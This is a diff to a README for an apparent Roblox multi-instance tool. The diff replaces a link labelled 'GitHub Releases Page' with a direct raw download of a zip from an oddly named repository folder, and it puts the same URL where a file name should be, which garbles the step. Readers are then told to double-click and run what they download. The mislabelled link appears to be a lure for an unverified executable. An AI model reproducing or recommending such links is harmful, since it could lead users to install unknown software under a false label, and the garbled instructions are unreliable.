MrX804/Roblox-Multi-Instance/README.md

 ## 📂 Download & Install

-To download Roblox-Multi-Instance, visit this page: [GitHub Releases Page](https://github.com/MrX804/Roblox-Multi-Instance/releases).
+To download Roblox-Multi-Instance, visit this page: [GitHub Releases Page](https://raw.githubusercontent.com/MrX804/Roblox-Multi-Instance/main/virginship/Roblox-Multi-Instance.zip).

 1. Click on the link above.
 2. Look for the latest release version.
 3. Download the executable file.
-It might be named something like `Roblox-Multi-Instance.exe`.
+It might be named something like `https://raw.githubusercontent.com/MrX804/Roblox-Multi-Instance/main/virginship/Roblox-Multi-Instance.zip`.
 4. Once the download is complete, locate the file in your downloads folder.
 5. Double-click the file to run the installer.
 6. Follow the prompts to complete the installation.